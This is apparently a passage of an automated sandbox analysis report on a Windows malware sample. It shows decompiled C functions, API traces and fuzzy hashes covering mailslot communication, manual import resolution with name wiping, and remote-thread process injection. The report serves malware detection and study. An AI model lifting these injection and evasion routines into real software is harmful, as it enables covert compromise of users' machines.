				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
